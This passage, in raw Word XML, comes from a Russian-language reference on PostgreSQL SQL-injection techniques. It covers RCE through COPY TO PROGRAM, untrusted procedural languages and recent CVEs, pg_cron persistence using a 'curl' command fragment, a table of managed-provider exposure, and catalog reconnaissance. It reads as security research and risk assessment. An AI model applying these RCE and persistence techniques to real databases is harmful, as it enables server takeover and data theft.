    <w:p w14:paraId="2611E1B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "до доверенных ролей.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D2D48"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6F8EEA09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Risk 10 для всех трёх паттернов — максимальный, потому что любая из этих находок означает либо реальный RCE-вектор, либо паттерн, неотличимый от попытки эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B55507" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>cron-extensions — boilerplate для отсроченного запуска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8BCDD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgagent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> позволяют расписать SQL по cron-выражению. Сами по себе не дают command execution, но используются как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обвес</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к 3.7.1/3.7.2a/3.7.3: атакующий вставляет в cron-job </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... TO PROGRAM 'curl …'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для persistence, либо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION plpython3u + SELECT fn()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с отложенным запуском. На managed-провайдерах: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен на AWS RDS (как preview), Cloud SQL и Azure Database for PostgreSQL — но запускается под superuser (RDS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), а RCE-векторы там структурно закрыты. На self-hosted PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> плюс superuser — реальный путь к </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>persistent RCE. В категории 3.7 кратко упоминается; детальная карточка — в 3.13 (privilege escalation) или в саммари 5.4 (mitigations расширений).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71640126" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D056B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — COPY FROM/TO PROGRAM: PostgreSQL Docs (sql-copy, predefined-roles), Greenwolf classic, Rapid7 Metasploit module (postgres_copy_from_program_cmd_exec), CVE-2019-9193 disputed advisory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5115A207" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2024-10979 + untrusted languages: PostgreSQL Project Security Advisory (CVE-2024-10979), PoC репозиторий gh-ost00/CVE-2024-10979, RedRays step-by-step reproduction guide, NIST NVD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5BD4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R6/R21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — chain CVE-2025-1094 → COPY PROGRAM: PostgreSQL advisory CVE-2025-1094, Rapid7 SecureLayer7 разбор chain, BeyondTrust BT24-12356 Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C6692" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTricks PostgreSQL Injection (раздел RCE), PortSwigger Web Security Academy (SQLi cheat sheet PostgreSQL section), Rapid7 Metasploit Postgres modules index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7FE4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Docs расширений:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL plperl (trusted/untrusted), plpython, plsh GitHub (petere/plsh), plr GitHub, plv8 GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D3B533" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB4EA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 Privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — без получения superuser или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> три из четырёх путей 3.7 недоступны. 3.13 описывает методы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27653071" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (R8) для смены роли в той же сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70001585" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   search_path hijacking + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schema_element</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (R12) для подмены функции в admin-сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E46918B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Extension scripts (R16) для пре-installed RCE через скомпрометированное расширение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044A4FA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Index expressions + autovacuum (R15) для исполнения кода под owner-роли таблицы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DE5817" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.4 lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — file-write вектор; единственный realistic канал доставки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для 3.7.2b (CVE-2024-10979) внутри одной DB-сессии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E63A74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10 Data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива стакингу для протаскивания DDL в инъекции, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокирован extended-протоколом. Может комбинироваться с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION ... LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через WITH-блок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D54A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Хронология 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст CVE-2024-10979 / 10978 / 10976 / 10977 (все четыре фикса 14.11.2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27853C59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 Хронология 2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — детали CVE-2025-1094 для chain R6 → R3 в Payload C из 3.7.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D68E638" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C54BB8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все четыре пути RCE в managed-PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>структурно ограничены или недоступны</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2770"/>
        <w:gridCol w:w="1772"/>
        <w:gridCol w:w="1674"/>
        <w:gridCol w:w="1564"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="026D868D"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9ABD575" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Провайдер</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028BD0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>COPY PROGRAM</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5E96382" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plperlu</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59B2628" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10979 (plperl)</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C137B4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plpython3u / plsh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4AB2EBAA"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CF7955" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AWS RDS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6E8EDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">недоступно (нет </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_execute_server_program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>rds_superuser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> не равен superuser)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6BB517" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">недоступно (нет в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>rds.extensions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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0EF00C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>опционально, патчится в minor-обновлениях</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1BDB24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>недоступно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5CDD1183"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07AEB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Google Cloud SQL</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C5EFFB"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9439B0"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75F60C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plperl доступен</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>патч обычно накатан</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6CED6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>недоступно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="000FE9F8"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F5C128" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Supabase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FFEAF5"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E5812A"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98D8A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>plperl не доступен</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BCB246" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>недоступно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2BE86D42"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F8DF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Azure Database for PG</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45D90F"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A4C8AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>недоступно</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B35F7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>опционально, патчится в minor-обновлениях</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2A1DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>недоступно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EB44BE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Реальная угроза 3.7 — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>self-hosted PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (on-prem, EC2-VM с PG, k8s-stateful-set). В managed-окружении даже SQLi на superuser-уровне не даёт RCE — провайдер ограничивает API серверной фичи (COPY PROGRAM, untrusted extensions). Единственная остаточная угроза — CVE-2024-10979 на Cloud SQL до накатывания фикса, но эта окно обычно закрывается в течение недель после release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CFB47B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Детальный разбор managed-ограничений — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9 Managed-провайдеры: RDS, Cloud SQL, Supabase</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4B9FEE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.8.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C437813" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если 3.1–3.4 — про каналы вытаскивания строк из конкретной таблицы, то </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8 — про вытаскивание карты самой БД</w:t>
      </w:r>
      <w:r>
        <w:t>: какие схемы, какие таблицы, какие колонки, какие функции, какие роли и привилегии, какая версия PG, какие расширения установлены, какие GUC-параметры выставлены. Эта карта — пререквизит для всех остальных категорий: какие колонки выбирать в UNION (3.1), какие функции вызывать для OOB (3.6), под какие CVE подходит обнаруженная версия (4.x), к какой SECURITY DEFINER функции цепляться для эскалации (3.13).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362729A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В типичной атаке 3.8 идёт первым шагом после получения точки инъекции: атакующий не знает, как называются таблицы и колонки приложения, и системные каталоги PG — единственный надёжный источник этой информации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D367F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL здесь отличается</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73486FC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Системные каталоги стандартизованы.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</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pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеют одинаковую структуру от PostgreSQL 9.x до 17. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тоже есть (SQL-стандарт), но детальная карта — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t>. Имена и типы колонок системных каталогов известны заранее, payload-ы пишутся без предварительной разведки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF43713" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Доступ к большинству каталогов — PUBLIC.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
